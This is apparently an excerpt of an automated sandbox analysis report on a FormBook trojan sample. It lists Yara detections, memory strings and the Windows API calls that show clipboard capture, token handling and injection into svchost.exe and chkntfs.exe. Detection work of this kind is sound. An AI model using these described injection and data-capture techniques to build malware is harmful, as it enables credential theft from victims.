            Source: chkntfs.exe, 00000003.00000002.3538097911.00000000071E0000.00000004.00000800.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536613638.0000000005026000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536613638.000000000566E000.00000004.10000000.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536163468.0000000003B9E000.00000004.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536163468.0000000003556000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: chkntfs.exe, 00000003.00000003.2069940326.000000000748E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009FEAFF
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009FED6A
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009FEAFF
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009EAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_009EAA57
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_00A19576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00A19576

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: p4LNUqyKZM.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: p4LNUqyKZM.exe, 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c4e97d31-2
            Source: p4LNUqyKZM.exe, 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f3dba2bb-d
            Source: p4LNUqyKZM.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_858fbac3-d
            Source: p4LNUqyKZM.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_68058db4-2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C973 NtClose,1_2_0042C973
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72B60 NtClose,LdrInitializeThunk,1_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B735C0 NtCreateMutant,LdrInitializeThunk,1_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B74340 NtSetContextThread,1_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B74650 NtSuspendThread,1_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BA0 NtEnumerateValueKey,1_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72B80 NtQueryInformationFile,1_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BF0 NtAllocateVirtualMemory,1_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BE0 NtQueryValueKey,1_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AB0 NtWaitForSingleObject,1_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AF0 NtWriteFile,1_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AD0 NtReadFile,1_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FB0 NtResumeThread,1_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FA0 NtQuerySection,1_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F90 NtProtectVirtualMemory,1_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FE0 NtCreateFile,1_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F30 NtCreateSection,1_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F60 NtCreateProcessEx,1_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72EA0 NtAdjustPrivilegesToken,1_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72E80 NtReadVirtualMemory,1_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72EE0 NtQueueApcThread,1_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72E30 NtWriteVirtualMemory,1_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DB0 NtEnumerateKey,1_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DD0 NtDelayExecution,1_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D30 NtUnmapViewOfSection,1_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D10 NtMapViewOfSection,1_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D00 NtSetInformationFile,1_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CA0 NtQueryInformationToken,1_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CF0 NtOpenProcess,1_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CC0 NtQueryVirtualMemory,1_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C00 NtQueryInformationProcess,1_2_03B72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C60 NtCreateKey,1_2_03B72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73090 NtSetValueKey,1_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73010 NtOpenDirectoryObject,1_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B739B0 NtGetContextThread,1_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73D10 NtOpenProcessToken,1_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73D70 NtOpenThread,1_2_03B73D70
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F4650 NtSuspendThread,LdrInitializeThunk,3_2_044F4650
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F4340 NtSetContextThread,LdrInitializeThunk,3_2_044F4340
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2C60 NtCreateKey,LdrInitializeThunk,3_2_044F2C60
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_044F2C70
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_044F2CA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_044F2D10
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_044F2D30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2DD0 NtDelayExecution,LdrInitializeThunk,3_2_044F2DD0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_044F2DF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_044F2EE0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_044F2E80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2F30 NtCreateSection,LdrInitializeThunk,3_2_044F2F30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2FE0 NtCreateFile,LdrInitializeThunk,3_2_044F2FE0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2FB0 NtResumeThread,LdrInitializeThunk,3_2_044F2FB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2AD0 NtReadFile,LdrInitializeThunk,3_2_044F2AD0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2AF0 NtWriteFile,LdrInitializeThunk,3_2_044F2AF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2B60 NtClose,LdrInitializeThunk,3_2_044F2B60
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_044F2BE0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_044F2BF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_044F2BA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F35C0 NtCreateMutant,LdrInitializeThunk,3_2_044F35C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F39B0 NtGetContextThread,LdrInitializeThunk,3_2_044F39B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2C00 NtQueryInformationProcess,3_2_044F2C00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2CC0 NtQueryVirtualMemory,3_2_044F2CC0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2CF0 NtOpenProcess,3_2_044F2CF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2D00 NtSetInformationFile,3_2_044F2D00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2DB0 NtEnumerateKey,3_2_044F2DB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2E30 NtWriteVirtualMemory,3_2_044F2E30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2EA0 NtAdjustPrivilegesToken,3_2_044F2EA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2F60 NtCreateProcessEx,3_2_044F2F60
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2F90 NtProtectVirtualMemory,3_2_044F2F90
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2FA0 NtQuerySection,3_2_044F2FA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2AB0 NtWaitForSingleObject,3_2_044F2AB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F2B80 NtQueryInformationFile,3_2_044F2B80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F3010 NtOpenDirectoryObject,3_2_044F3010
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F3090 NtSetValueKey,3_2_044F3090
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F3D70 NtOpenThread,3_2_044F3D70
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F3D10 NtOpenProcessToken,3_2_044F3D10
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004E9270 NtCreateFile,3_2_004E9270
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004E93E0 NtReadFile,3_2_004E93E0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004E94D0 NtDeleteFile,3_2_004E94D0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004E9570 NtClose,3_2_004E9570
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004E96D0 NtAllocateVirtualMemory,3_2_004E96D0
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009ED5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_009ED5EB
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_009E1201
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009EE8F6
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F20460_2_009F2046
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009880600_2_00988060
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009E82980_2_009E8298
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009BE4FF0_2_009BE4FF
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009B676B0_2_009B676B
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_00A148730_2_00A14873
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009ACAA00_2_009ACAA0
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_0098CAF00_2_0098CAF0
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_0099CC390_2_0099CC39
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009B6DD90_2_009B6DD9
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009891C00_2_009891C0
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_0099B1190_2_0099B119
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A13940_2_009A1394
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A17060_2_009A1706
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A781B0_2_009A781B
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A19B00_2_009A19B0
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009879200_2_00987920
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_0099997D0_2_0099997D
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A7A4A0_2_009A7A4A
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A7CA70_2_009A7CA7
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A1C770_2_009A1C77
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009B9EEE0_2_009B9EEE
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_00A0BE440_2_00A0BE44
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A1F320_2_009A1F32
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009636300_2_00963630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004188D31_2_004188D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028201_2_00402820
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011601_2_00401160
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041010D1_2_0041010D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004101131_2_00410113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031901_2_00403190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416A6D1_2_00416A6D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416AAF1_2_00416AAF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416AB31_2_00416AB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004103331_2_00410333
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E3B11_2_0040E3B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E3B31_2_0040E3B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402C441_2_00402C44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402C501_2_00402C50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004024A01_2_004024A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EFD31_2_0042EFD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C003E61_2_03C003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F01_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA3521_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC02C01_2_03BC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE02741_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF41A21_2_03BF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C001AA1_2_03C001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF81CC1_2_03BF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA1181_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B301001_2_03B30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC81581_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD20001_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3C7C01_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B407701_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B647501_2_03B64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5C6E01_2_03B5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C005911_2_03C00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B405351_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEE4F61_2_03BEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE44201_2_03BE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF24461_2_03BF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF6BD71_2_03BF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFAB401_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA801_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A01_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0A9A61_2_03C0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B569621_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B268B81_2_03B268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E8F01_2_03B6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4A8401_2_03B4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B428401_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBEFA01_2_03BBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32FC81_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B60F301_2_03B60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE2F301_2_03BE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B82F281_2_03B82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB4F401_2_03BB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52E901_2_03B52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFCE931_2_03BFCE93
